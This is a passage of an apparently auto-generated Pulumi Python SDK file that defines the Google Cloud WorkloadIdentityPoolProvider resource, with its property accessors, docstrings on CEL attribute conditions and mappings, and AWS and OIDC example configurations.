`gcp-` is reserved for use by Google, and may not be specified. """ return pulumi.get(self, "workload_identity_pool_id") @workload_identity_pool_id.setter def workload_identity_pool_id(self, value: pulumi.Input[str]): pulumi.set(self, "workload_identity_pool_id", value) @property @pulumi.getter(name="workloadIdentityPoolProviderId") def workload_identity_pool_provider_id(self) -> pulumi.Input[str]: """ The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """ return pulumi.get(self, "workload_identity_pool_provider_id") @workload_identity_pool_provider_id.setter def workload_identity_pool_provider_id(self, value: pulumi.Input[str]): pulumi.set(self, "workload_identity_pool_provider_id", value) @property @pulumi.getter(name="attributeCondition") def attribute_condition(self) -> Optional[pulumi.Input[str]]: """ [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` """ return pulumi.get(self, "attribute_condition") @attribute_condition.setter def attribute_condition(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "attribute_condition", value) @property @pulumi.getter(name="attributeMapping") def attribute_mapping(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` """ return pulumi.get(self, "attribute_mapping") @attribute_mapping.setter def attribute_mapping(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "attribute_mapping", value) @property @pulumi.getter def aws(self) -> Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]: """ An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. """ return pulumi.get(self, "aws") @aws.setter def aws(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]): pulumi.set(self, "aws", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ A description for the provider. Cannot exceed 256 characters. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter def disabled(self) -> Optional[pulumi.Input[bool]]: """ Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. """ return pulumi.get(self, "disabled") @disabled.setter def disabled(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "disabled", value) @property @pulumi.getter(name="displayName") def display_name(self) -> Optional[pulumi.Input[str]]: """ A display name for the provider. Cannot exceed 32 characters. """ return pulumi.get(self, "display_name") @display_name.setter def display_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "display_name", value) @property @pulumi.getter def oidc(self) -> Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]: """ An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. """ return pulumi.get(self, "oidc") @oidc.setter def oidc(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]): pulumi.set(self, "oidc", value) @property @pulumi.getter def project(self) -> Optional[pulumi.Input[str]]: """ The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """ return pulumi.get(self, "project") @project.setter def project(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "project", value) @pulumi.input_type class _WorkloadIdentityPoolProviderState: def __init__(__self__, *, attribute_condition: Optional[pulumi.Input[str]] = None, attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, aws: Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']] = None, description: Optional[pulumi.Input[str]] = None, disabled: Optional[pulumi.Input[bool]] = None, display_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, oidc: Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']] = None, project: Optional[pulumi.Input[str]] = None, state: Optional[pulumi.Input[str]] = None, workload_identity_pool_id: Optional[pulumi.Input[str]] = None, workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None): """ Input properties used for looking up and filtering WorkloadIdentityPoolProvider resources. :param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` :param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` :param pulumi.Input['WorkloadIdentityPoolProviderAwsArgs'] aws: An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. :param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters. :param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. :param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters. :param pulumi.Input[str] name: The resource name of the provider as 'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'. :param pulumi.Input['WorkloadIdentityPoolProviderOidcArgs'] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[str] state: The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider until it is permanently deleted. :param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """ if attribute_condition is not None: pulumi.set(__self__, "attribute_condition", attribute_condition) if attribute_mapping is not None: pulumi.set(__self__, "attribute_mapping", attribute_mapping) if aws is not None: pulumi.set(__self__, "aws", aws) if description is not None: pulumi.set(__self__, "description", description) if disabled is not None: pulumi.set(__self__, "disabled", disabled) if display_name is not None: pulumi.set(__self__, "display_name", display_name) if name is not None: pulumi.set(__self__, "name", name) if oidc is not None: pulumi.set(__self__, "oidc", oidc) if project is not None: pulumi.set(__self__, "project", project) if state is not None: pulumi.set(__self__, "state", state) if workload_identity_pool_id is not None: pulumi.set(__self__, "workload_identity_pool_id", workload_identity_pool_id) if workload_identity_pool_provider_id is not None: pulumi.set(__self__, "workload_identity_pool_provider_id", workload_identity_pool_provider_id) @property @pulumi.getter(name="attributeCondition") def attribute_condition(self) -> Optional[pulumi.Input[str]]: """ [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` """ return pulumi.get(self, "attribute_condition") @attribute_condition.setter def attribute_condition(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "attribute_condition", value) @property @pulumi.getter(name="attributeMapping") def attribute_mapping(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` """ return pulumi.get(self, "attribute_mapping") @attribute_mapping.setter def attribute_mapping(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "attribute_mapping", value) @property @pulumi.getter def aws(self) -> Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]: """ An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. """ return pulumi.get(self, "aws") @aws.setter def aws(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']]): pulumi.set(self, "aws", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ A description for the provider. Cannot exceed 256 characters. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter def disabled(self) -> Optional[pulumi.Input[bool]]: """ Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. """ return pulumi.get(self, "disabled") @disabled.setter def disabled(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "disabled", value) @property @pulumi.getter(name="displayName") def display_name(self) -> Optional[pulumi.Input[str]]: """ A display name for the provider. Cannot exceed 32 characters. """ return pulumi.get(self, "display_name") @display_name.setter def display_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "display_name", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The resource name of the provider as 'projects/{project_number}/locations/global/workloadIdentityPools/{workload_identity_pool_id}/providers/{workload_identity_pool_provider_id}'. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter def oidc(self) -> Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]: """ An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. """ return pulumi.get(self, "oidc") @oidc.setter def oidc(self, value: Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']]): pulumi.set(self, "oidc", value) @property @pulumi.getter def project(self) -> Optional[pulumi.Input[str]]: """ The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """ return pulumi.get(self, "project") @project.setter def project(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "project", value) @property @pulumi.getter def state(self) -> Optional[pulumi.Input[str]]: """ The state of the provider. * STATE_UNSPECIFIED: State unspecified. * ACTIVE: The provider is active, and may be used to validate authentication credentials. * DELETED: The provider is soft-deleted. Soft-deleted providers are permanently deleted after approximately 30 days. You can restore a soft-deleted provider using UndeleteWorkloadIdentityPoolProvider. You cannot reuse the ID of a soft-deleted provider until it is permanently deleted. """ return pulumi.get(self, "state") @state.setter def state(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "state", value) @property @pulumi.getter(name="workloadIdentityPoolId") def workload_identity_pool_id(self) -> Optional[pulumi.Input[str]]: """ The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """ return pulumi.get(self, "workload_identity_pool_id") @workload_identity_pool_id.setter def workload_identity_pool_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "workload_identity_pool_id", value) @property @pulumi.getter(name="workloadIdentityPoolProviderId") def workload_identity_pool_provider_id(self) -> Optional[pulumi.Input[str]]: """ The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """ return pulumi.get(self, "workload_identity_pool_provider_id") @workload_identity_pool_provider_id.setter def workload_identity_pool_provider_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "workload_identity_pool_provider_id", value) class WorkloadIdentityPoolProvider(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, attribute_condition: Optional[pulumi.Input[str]] = None, attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, aws: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']]] = None, description: Optional[pulumi.Input[str]] = None, disabled: Optional[pulumi.Input[bool]] = None, display_name: Optional[pulumi.Input[str]] = None, oidc: Optional[pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']]] = None, project: Optional[pulumi.Input[str]] = None, workload_identity_pool_id: Optional[pulumi.Input[str]] = None, workload_identity_pool_provider_id: Optional[pulumi.Input[str]] = None, __props__=None): """ A configuration for an external identity provider. To get more information about WorkloadIdentityPoolProvider, see: * [API documentation](https://cloud.google.com/iam/docs/reference/rest/v1beta/projects.locations.workloadIdentityPools.providers) * How-to Guides * [Managing workload identity providers](https://cloud.google.com/iam/docs/manage-workload-identity-pools-providers#managing_workload_identity_providers) ## Example Usage ### Iam Workload Identity Pool Provider Aws Basic ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs( account_id="999999999999", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Aws Full ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", display_name="Name of provider", description="AWS identity pool provider for automated test", disabled=True, attribute_condition="attribute.aws_role==\"arn:aws:sts::999999999999:assumed-role/stack-eu-central-1-lambdaRole\"", attribute_mapping={ "google.subject": "assertion.arn", "attribute.aws_account": "assertion.account", "attribute.environment": "assertion.arn.contains(\":instance-profile/Production\") ? \"prod\" : \"test\"", }, aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs( account_id="999999999999", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Oidc Basic ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", attribute_mapping={ "google.subject": "assertion.sub", }, oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs( issuer_uri="https://sts.windows.net/azure-tenant-id", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Oidc Full ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", display_name="Name of provider", description="OIDC identity pool provider for automated test", disabled=True, attribute_condition="\"e968c2ef-047c-498d-8d79-16ca1b61e77e\" in assertion.groups", attribute_mapping={ "google.subject": "\"azure::\" + assertion.tid + \"::\" + assertion.sub", "attribute.tid": "assertion.tid", "attribute.managed_identity_name": \"\"\" { "8bb39bdb-1cc5-4447-b7db-a19e920eb111":"workload1", "55d36609-9bcf-48e0-a366-a3cf19027d2a":"workload2" }[assertion.oid] \"\"\", }, oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs( allowed_audiences=[ "https://example.com/gcp-oidc-federation", "example.com/gcp-oidc-federation", ], issuer_uri="https://sts.windows.net/azure-tenant-id", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ## Import WorkloadIdentityPoolProvider can be imported using any of these accepted formats ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default projects/{{project}}/locations/global/workloadIdentityPools/{{workload_identity_pool_id}}/providers/{{workload_identity_pool_provider_id}} ``` ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{project}}/{{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}} ``` ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}} ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` :param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` :param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderAwsArgs']] aws: An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. :param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters. :param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. :param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters. :param pulumi.Input[pulumi.InputType['WorkloadIdentityPoolProviderOidcArgs']] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. """ ... @overload def __init__(__self__, resource_name: str, args: WorkloadIdentityPoolProviderArgs, opts: Optional[pulumi.ResourceOptions] = None): """ A configuration for an external identity provider. To get more information about WorkloadIdentityPoolProvider, see: * [API documentation](https://cloud.google.com/iam/docs/reference/rest/v1beta/projects.locations.workloadIdentityPools.providers) * How-to Guides * [Managing workload identity providers](https://cloud.google.com/iam/docs/manage-workload-identity-pools-providers#managing_workload_identity_providers) ## Example Usage ### Iam Workload Identity Pool Provider Aws Basic ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs( account_id="999999999999", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Aws Full ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", display_name="Name of provider", description="AWS identity pool provider for automated test", disabled=True, attribute_condition="attribute.aws_role==\"arn:aws:sts::999999999999:assumed-role/stack-eu-central-1-lambdaRole\"", attribute_mapping={ "google.subject": "assertion.arn", "attribute.aws_account": "assertion.account", "attribute.environment": "assertion.arn.contains(\":instance-profile/Production\") ? \"prod\" : \"test\"", }, aws=gcp.iam.WorkloadIdentityPoolProviderAwsArgs( account_id="999999999999", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Oidc Basic ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", attribute_mapping={ "google.subject": "assertion.sub", }, oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs( issuer_uri="https://sts.windows.net/azure-tenant-id", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ### Iam Workload Identity Pool Provider Oidc Full ```python import pulumi import pulumi_gcp as gcp pool = gcp.iam.WorkloadIdentityPool("pool", workload_identity_pool_id="example-pool", opts=pulumi.ResourceOptions(provider=google_beta)) example = gcp.iam.WorkloadIdentityPoolProvider("example", workload_identity_pool_id=pool.workload_identity_pool_id, workload_identity_pool_provider_id="example-prvdr", display_name="Name of provider", description="OIDC identity pool provider for automated test", disabled=True, attribute_condition="\"e968c2ef-047c-498d-8d79-16ca1b61e77e\" in assertion.groups", attribute_mapping={ "google.subject": "\"azure::\" + assertion.tid + \"::\" + assertion.sub", "attribute.tid": "assertion.tid", "attribute.managed_identity_name": \"\"\" { "8bb39bdb-1cc5-4447-b7db-a19e920eb111":"workload1", "55d36609-9bcf-48e0-a366-a3cf19027d2a":"workload2" }[assertion.oid] \"\"\", }, oidc=gcp.iam.WorkloadIdentityPoolProviderOidcArgs( allowed_audiences=[ "https://example.com/gcp-oidc-federation", "example.com/gcp-oidc-federation", ], issuer_uri="https://sts.windows.net/azure-tenant-id", ), opts=pulumi.ResourceOptions(provider=google_beta)) ``` ## Import WorkloadIdentityPoolProvider can be imported using any of these accepted formats ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default projects/{{project}}/locations/global/workloadIdentityPools/{{workload_identity_pool_id}}/providers/{{workload_identity_pool_provider_id}} ``` ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{project}}/{{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}} ``` ```sh $ pulumi import gcp:iam/workloadIdentityPoolProvider:WorkloadIdentityPoolProvider default {{workload_identity_pool_id}}/{{workload_identity_pool_provider_id}} ``` :param str resource_name: The name of the resource. :param WorkloadIdentityPoolProviderArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = 